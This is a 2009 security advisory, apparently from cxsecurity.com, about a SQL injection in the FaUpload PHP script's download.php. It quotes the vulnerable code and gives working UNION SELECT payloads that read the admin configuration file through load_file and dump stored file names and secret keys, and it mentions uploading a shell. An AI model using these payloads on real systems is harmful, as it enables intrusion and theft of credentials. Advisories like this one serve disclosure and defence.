FaScript FaUpload (download.php) SQL Injection Vulnerability

2009.01.02
Credit: ZAC003
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

!!..:: ZAC003 ::..!! -+( Vive int Iranian WhiteHat Nomads Group )+- ------------------------------------------------------------------------------------------- Reporter : ZAC003 From Aria-Security.Net Script Download : http://webscripts.softpedia.com/script/Internet-Browsers-C-C/FTP/Faupload-41231.html BUG : + class/download.php + [Code] 4: $id = $_GET['id']; //Bug Here ! 5: $how = "n"; 6: $kind = "point"; 7: $result = mysql_query("SELECT * FROM file WHERE $kind LIKE '$id' order by id DESC"); //Bug Here ! 8: while($r=mysql_fetch_array($result)) 9: { [/Code] [Exploit] Example Downlaod : http://127.0.0.1/faupload/download.php?id=c16a5320fa475530d9583c34fd356ef5 Inject : http://127.0.0.1/faupload/download.php?id=-999'< SQL Command >/* For View Admin UserName,Password(./admin/pconfig.php ) : -999'/**/union/**/select/**/1,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),3,4,5,6,7,8,9/**/from/**/file/* For View File Name And Secret Key (PROVIDING BE) : For View Admin UserName,Password : -999'/**/union/**/select/**/1,name,3,4,5,6,skey,8,9/**/from/**/file/* Upload Shell = [Priv8 Perl Script] Update Ads Table(id,text): Use Update SQL Command ! [/Exploit] ------------------------------------------------------------------------------------------- For Contact : ZAC003[at]Y![dot]Com , Aria-Security.net(Forum And Best WebBase Hacking Tools) SpTnX : Aria-Security Team , Emperor Hacking Team , Iranian WhiteHat Nomads Group greets : M3hd!.h4ckCity And All Member of Aria-Security

References:

http://xforce.iss.net/xforce/xfdb/47394


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top